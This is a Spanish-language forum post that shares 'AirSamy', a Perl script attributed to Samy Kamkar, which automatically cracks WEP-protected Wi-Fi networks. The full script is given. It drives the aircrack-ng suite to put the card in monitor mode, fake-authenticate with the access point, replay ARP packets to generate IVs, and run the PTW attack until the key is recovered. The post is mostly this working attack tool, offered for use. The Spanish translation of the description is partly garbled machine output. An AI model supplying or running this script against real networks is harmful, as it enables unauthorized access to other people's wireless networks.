AirSamy [Script]

D3M0N · 21 de Junio de 2011, 11:45:01 AM

Cita de: Samy Kamkarairsamy provides a simple interface to quickly and automatically crack a WEP network in minutes. It displays a list of available WEP networks and once selected, it automatically places your driver in monitor mode, tests packet injection, fake authenticates with the AP, captures IVs for cracking, captures ARP packets and replays them to introduce more IVs into the network, and cracks using the PTW attack.

airsamy proporciona una interfaz sencilla para acabar de forma rí¡pida y automí¡ticamente a una red WEP en cuestiín de minutos. Se muestra una lista de redes disponibles WEP y una vez seleccionado, se coloca automí¡ticamente el controlador en modo monitor, la inyecciín de paquetes de pruebas, falso autentica con el AP, IVs captura de grietas, captura los paquetes ARP y los reproduce para introducir mí¡s IVs en la red, y las grietas con el ataque PTW.

Codigo:

Código: php

#!/usr/bin/perluse strict;my $interface = shift || "wlan0";my $airmon	= "airmon-ng";my $aireplay	= "aireplay-ng";my $aircrack	= "aircrack-ng";my $airodump	= "airodump-ng";# stop + start interfacesystem($airmon, "start", $interface);print "Please find an AP to use. When found, hit CTRL+C.\n";print "[remember part of the name or part of BSSID]\n";# tmpfile for ap outputmy $tmpfile = "/tmp/airsamy" . rand();unlink(glob("$tmpfile*"));# show user APseval {	local $SIG{INT} = sub { die };	open(DUMP, "$airodump --output-format csv -w $tmpfile $interface|") || die "Can't run airodump ($airodump): $!";};close(DUMP);# read in APsmy %aps;my ($tmpfile1) = glob("$tmpfile*");open(APS, "<$tmpfile1") || die "Can't read tmp file $tmpfile1: $!";while (<APS>){	chomp;	s/://g;	s/\s+/ /g;	$aps{$_} = 1;}close(APS);unlink($tmpfile1);# ask for APmy ($input, $ap);while (!$ap){	my $found = 0;	print "\nPlease enter part of the name/bssid of the AP: ";	chomp($input = <STDIN>);	$input =~ s/://g;	print "\n";	foreach my $tmpap (keys %aps)	{		my @data = split(/\s*,\s+/, $tmpap);		if ($tmpap =~ /$input/i)		{			print "Found: $data[0] ($data[13]) ch=$data[3] mb=$data[4] enc=$data[5] $data[6] $data[7]";			if ($data[5] !~ /WEP/)			{				print " -- NOT WEP!";			}			else			{				$found++;				$ap = $tmpap;			}			print "\n";		}	}	if ($found > 1)	{		$ap = undef;		print "\nPlease be more specific.\n\n";	}}# get ap infomy @data = split(/\s*,\s+/, $ap);my ($bssid, $essid, $chan) = ($data[0], $data[13], $data[3]);# start on channelsystem($airmon, "start", $interface, $chan);# test injectionsystem($aireplay, "-9", "-e", $essid, "-a", $bssid, $interface);# fake auth with the APsystem($aireplay, "-1", "0", "-e", $essid, "-a", $bssid, $interface);# fork off, capture IVs in frontif (fork()){	# capture IVs	system($airodump, "-c", $chan, "--bssid", $bssid, "-w", $tmpfile, $interface);	# crack!	#system($aircrack, "-z", glob("$tmpfile*cap"));	# remove extra files	unlink(glob("$tmpfile*"));}# do background stuff to produce packetselse{	sleep(1);	# crack until we find something	if (fork())	{		my ($key);		while (!$key)		{			open(CRACK, "$aircrack -z " . join(" ", glob("$tmpfile*cap")) . "|");			while (<CRACK>)			{				if (/correctly:\s*100%/)				{					$key = 1;					close(CRACK);				}			}		}		system("killall", "-9", $aireplay, $airodump);		system($aircrack, "-z", glob("$tmpfile*cap"));	}	# inject arps	else	{		# capture an ARP and replay		system($aireplay, "-3", "-b", $bssid, $interface);	}}

SITIO: You are not allowed to view links. Register or Login

AirSamy [Script]

D3M0N